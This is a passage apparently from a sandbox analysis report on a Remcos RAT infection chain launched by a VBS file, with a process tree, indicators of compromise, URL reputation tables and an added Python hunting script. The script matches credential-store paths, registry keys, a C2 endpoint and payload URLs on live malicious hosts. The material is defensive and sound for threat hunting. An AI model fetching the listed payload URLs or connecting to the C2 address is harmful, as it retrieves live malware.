        signatures: Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading
        -> wab.exe
          network: 103.237.87.159, 49739, 49740, 9462 (BGNR-AP2BainandCompanySG, unknown); geoplugin.net 178.237.33.50, 49741, 80 (ATOM86-ASATOM86NL, Netherlands)
          dropped: C:\ProgramData\remcos\logs.dat (data)
          signatures: Detected Remcos RAT, Maps a DLL or memory area into another process, Installs a global keyboard hook
          -> wab.exe: Tries to steal Instant Messenger accounts or passwords, Tries to steal Mail credentials (via file / registry access)
          -> wab.exe
          -> wab.exe: Tries to harvest and steal browser information (history, passwords, etc)
          -> 4 other processes
        -> cmd.exe
      -> conhost.exe
      -> cmd.exe
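The behaviour recorded above (wscript.exe launching PowerShell, PowerShell fetching a stage from 103.237.86.247, wab.exe spawned by PowerShell and then spawning more wab.exe, the Rmc-LO8JH mutex, the C:\ProgramData\remcos\logs.dat drop, the browser and mail-client credential-store reads, and the 103.237.87.159:9462 and geoplugin.net traffic) maps directly onto hunting rules. The script below is an added example written for this page, not Joe Sandbox code and not part of the sample; it runs those rules over constructed Sysmon-style event records. The allowlist of processes that may legitimately read the credential stores and the generalisation of the mutex to any Rmc-<id> name are assumptions.

```python
"""Hunting rules for the wscript -> PowerShell -> wab.exe (Remcos) chain in this report.

Added example for this page, not code from Joe Sandbox or from the sample. The
events at the bottom are constructed to look like Sysmon-style telemetry; they
are not captures from the analysis."""
import re
from dataclasses import dataclass

# Indicators quoted from the report sections above.
REMCOS_LOG = r"c:\programdata\remcos\logs.dat"
STAGER_HOST = "103.237.86.247"                 # PowerShell stage download
C2_ENDPOINTS = {("103.237.87.159", 9462)}      # Remcos C2
GEOLOC_HOST = "geoplugin.net"                  # Remcos geolocation lookup
# Report shows \BaseNamedObjects\Rmc-LO8JH; matching any Rmc-<id> is an assumption.
REMCOS_MUTEX_RE = re.compile(r"\\rmc-[a-z0-9]+$")

# Credential stores wab.exe opened (regexes over a lower-cased path / key prefixes).
CRED_FILE_RES = [re.compile(p) for p in (
    r"\\mozilla\\firefox\\profiles\\[^\\]+\\(key4\.db|places\.sqlite)$",
    r"\\mozilla\\firefox\\profiles\.ini$",
    r"\\google\\chrome\\user data\\[^\\]+\\(login data|web data)$",
    r"\\microsoft\\edge\\user data\\[^\\]+\\login data$",
)]
CRED_KEY_PREFIXES = (
    r"hkey_current_user\software\google\google talk\accounts",
    r"hkey_current_user\software\paltalk",
    r"hkey_current_user\software\microsoft\identitycrl\dynamic salt",
    r"hkey_current_user\software\microsoft\office\outlook\omi account manager\accounts",
    r"hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles",
    r"hkey_current_user\software\incredimail\identities",
    r"hkey_current_user\software\microsoft\windows live mail",
)
# Processes allowed to read those stores: an assumed allowlist, tune it per fleet.
STORE_OWNERS = {"firefox.exe", "chrome.exe", "msedge.exe", "outlook.exe"}


@dataclass
class Event:
    kind: str          # process | file | registry | mutex | network
    image: str         # acting process, full path
    parent: str = ""   # parent image (process events)
    target: str = ""   # file path, registry key, mutex name or remote host
    port: int = 0      # remote port (network events)


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check(e: Event):
    """Return the name of the first rule the event trips, or None."""
    img, par, tgt = _name(e.image), _name(e.parent), e.target.lower()
    if e.kind == "process":
        if img == "powershell.exe" and par == "wscript.exe":
            return "wscript_spawns_powershell"      # Sigma: WScript or CScript Dropper
        if img == "wab.exe" and par != "explorer.exe":
            return "wab_unusual_parent"             # Sigma: Wab unusual parent/child
    elif e.kind == "mutex" and REMCOS_MUTEX_RE.search(tgt):
        return "remcos_mutex"
    elif e.kind == "file":
        if tgt == REMCOS_LOG:
            return "remcos_keylog_file"
        if img not in STORE_OWNERS and any(r.search(tgt) for r in CRED_FILE_RES):
            return "browser_cred_store_read"
    elif e.kind == "registry":
        if img not in STORE_OWNERS and tgt.startswith(CRED_KEY_PREFIXES):
            return "mail_im_cred_key_read"
    elif e.kind == "network":
        if (tgt, e.port) in C2_ENDPOINTS:
            return "remcos_c2_connect"
        if img == "powershell.exe" and tgt == STAGER_HOST:
            return "powershell_stager_download"
        if img == "wab.exe" and tgt == GEOLOC_HOST:
            return "wab_geoplugin_lookup"
    return None


def hunt(events):
    """Run every event through check(); return the hits as (rule, process, target)."""
    return [(rule, _name(e.image), e.target) for e in events if (rule := check(e))]


WSCRIPT = r"C:\Windows\System32\wscript.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
APPDATA = r"C:\Users\user\AppData"

SAMPLE_EVENTS = [  # constructed; mirrors the report's process chain, then benign noise
    Event("process", PS, parent=WSCRIPT),
    Event("network", PS, target="103.237.86.247", port=80),
    Event("process", WAB, parent=PS),
    Event("mutex", WAB, target=r"\Sessions\1\BaseNamedObjects\Rmc-LO8JH"),
    Event("network", WAB, target="103.237.87.159", port=9462),
    Event("network", WAB, target="geoplugin.net", port=80),
    Event("file", WAB, target=r"C:\ProgramData\remcos\logs.dat"),
    Event("process", WAB, parent=WAB),
    Event("file", WAB, target=APPDATA + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db"),
    Event("registry", WAB, target=r"HKEY_CURRENT_USER\Software\Paltalk"),
    Event("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          target=APPDATA + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("process", WAB, parent=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, proc, target in hunt(SAMPLE_EVENTS):
        print(f"{rule:28} {proc:15} {target}")
```

On the constructed events the first ten records each trip one rule, while Chrome reading its own Login Data and wab.exe launched from explorer.exe trip none. The two wab.exe rules are the ones worth keeping even without Remcos-specific indicators: Windows Mail's wab.exe has no business being a child of PowerShell, and no business opening Firefox key4.db or HKCU\Software\Paltalk regardless of which RAT was injected into it.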

Source | Detection | Scanner | Label
STATEMENT OF ACCOUNT.vbs | 8% | ReversingLabs | Script-WScript.Trojan.GuLoader
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
geoplugin.net | 1% | Virustotal |
URL | Detection | Scanner (verdict)
https://contoso.com/License | 0% | URL Reputation (safe)
https://aka.ms/pscore6lB | 0% | URL Reputation (safe)
https://contoso.com/ | 0% | URL Reputation (safe)
https://nuget.org/nuget.exe | 0% | URL Reputation (safe)
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation (safe)
http://nuget.org/NuGet.exe | 0% | URL Reputation (safe)
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation (safe)
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation (safe)
https://go.micro | 0% | URL Reputation (safe)
https://contoso.com/Icon | 0% | URL Reputation (safe)
http://geoplugin.net/json.gp | 0% | URL Reputation (safe)
http://www.imvu.comta | 0% | Avira URL Cloud (safe)
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W | 0% | Avira URL Cloud (safe)
http://www.imvu.comr | 0% | Avira URL Cloud (safe)
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret.hhk | 0% | Avira URL Cloud (safe)
https://aka.ms/pscore68 | 0% | URL Reputation (safe)
http://103.237.86.247 | 0% | Avira URL Cloud (safe)
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud (safe)
http://103.237.86.247 | 0% | Virustotal
http://103.237.86 | 0% | Avira URL Cloud (safe)
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret.hhkXR | 0% | Avira URL Cloud (safe)
http://www.nirsoft.net | 0% | Avira URL Cloud (safe)
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud (safe)
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud (safe)
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr | 0% | Avira URL Cloud (safe)
http://103.237.86.247/U | 0% | Avira URL Cloud (safe)
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | 0% | Avira URL Cloud (safe)
http://www.nirsoft.net | 0% | Virustotal
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Virustotal
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udma | 0% | Avira URL Cloud (safe)
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud (safe)
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51 | 0% | Avira URL Cloud (safe)
https://www.google.com | 0% | Avira URL Cloud (safe)
http://geoplugin.net/json.gpC | 0% | Avira URL Cloud (safe)
https://deff.nelreports.net/api/report?cat=msn | 0% | Virustotal
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Ud | 0% | Avira URL Cloud (safe)
http://103.237 | 0% | Avira URL Cloud (safe)
http://103.237. | 0% | Avira URL Cloud (safe)
https://maps.windows.com/windows-app-web-link | 0% | Avira URL Cloud (safe)
http://103.237. | 0% | Virustotal
http://103.237 | 0% | Virustotal
http://geoplugin.net/json.gpC | 0% | Virustotal
http://103.237.8 | 0% | Avira URL Cloud (safe)
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud (safe)
http://103.2 | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmag | 0% | Avira URL Cloud (safe)
http://103.237.86. | 0% | Avira URL Cloud (safe)
https://maps.windows.com/windows-app-web-link | 0% | Virustotal
https://www.google.com | 0% | Virustotal
http://103.237.86.247/Udmagr | 0% | Avira URL Cloud (safe)
http://crl.micro? | 0% | Avira URL Cloud (safe)
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8 | 0% | Avira URL Cloud (safe)
https://login.yahoo.com/config/login | 0% | Avira URL Cloud (safe)
http://103.237.8 | 0% | Virustotal
http://geoplugin.net/json.gpW | 0% | Avira URL Cloud (safe)
http://103.2 | 1% | Virustotal
http://www.nirsoft.net/ | 0% | Avira URL Cloud (safe)
https://login.yahoo.com/config/login | 0% | Virustotal
http://103.237.86.247/NtqoCaH77.bin | 0% | Avira URL Cloud (safe)
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d | 0% | Avira URL Cloud (safe)
http://103.237H | 0% | Avira URL Cloud (safe)
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d | 0% | Avira URL Cloud (safe)
http://geoplugin.net/json.gpW | 0% | Virustotal
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | Avira URL Cloud (safe)
https://www.office.com/ | 0% | Avira URL Cloud (safe)
http://www.nirsoft.net/ | 0% | Virustotal
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8 | 0% | Avira URL Cloud (safe)
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68 | 0% | Avira URL Cloud (safe)
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2 | 0% | Avira URL Cloud (safe)
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d | 0% | Avira URL Cloud (safe)
http://geoplugin.net/json.gpk | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret.h | 0% | Avira URL Cloud (safe)
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437 | 0% | Avira URL Cloud (safe)
http://www.imvu.com | 0% | Avira URL Cloud (safe)
https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud (safe)
http://geoplugin.net/json.gpt | 0% | Avira URL Cloud (safe)
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326 | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udm | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagre | 0% | Avira URL Cloud (safe)
http://103.237.86.2 | 0% | Avira URL Cloud (safe)
https://github.com/Pester/Pester | 0% | Avira URL Cloud (safe)
http://103.237.86.247/ | 0% | Avira URL Cloud (safe)
103.237.87.159 | 0% | Avira URL Cloud (safe)
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03 | 0% | Avira URL Cloud (safe)
http://103.237.86.24 | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret. | 0% | Avira URL Cloud (safe)
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud (safe)
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae | 0% | Avira URL Cloud (safe)
http://103.237.86.247/Udmagret.hh | 0% | Avira URL Cloud (safe)
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7 | 0% | Avira URL Cloud (safe)
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD | 0% | Avira URL Cloud (safe)
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud (safe)
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993 | 0% | Avira URL Cloud (safe)
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud (safe)
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://103.237.86.247/Udmagret.hhk | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/NtqoCaH77.bin | false | Avira URL Cloud: safe | unknown
103.237.87.159 | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.imvu.comr | wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W | bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comta | wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingth | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247 | powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD6A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247/Udmagret.hhkXR | powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.237.86 | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | wab.exe, 0000000A.00000002.2348371588.0000000002F03000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2372810283.0000000002D83000.00000004.00000010.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/U | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742 | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Udma | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51 | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com | wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpC | wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://103.237.86.247/Ud | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237 | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://103.237. | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://maps.windows.com/windows-app-web-link | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://103.237.8 | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://103.2 | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://103.237.86.247/Udmag | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://103.237.86. | powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Udmagrpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.micro?powershell.exe, 00000004.00000002.2232934862.0000000006C5E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://login.yahoo.com/config/loginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpWwab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.nirsoft.net/wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237Hpowershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.office.com/bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://geoplugin.net/json.gpkwab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://go.micropowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://103.237.86.247/Udmagret.hpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.imvu.comwab.exe, wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=wsbbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://geoplugin.net/json.gptwab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Udmagrepowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Udmpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.2powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.24powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Udmagretpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
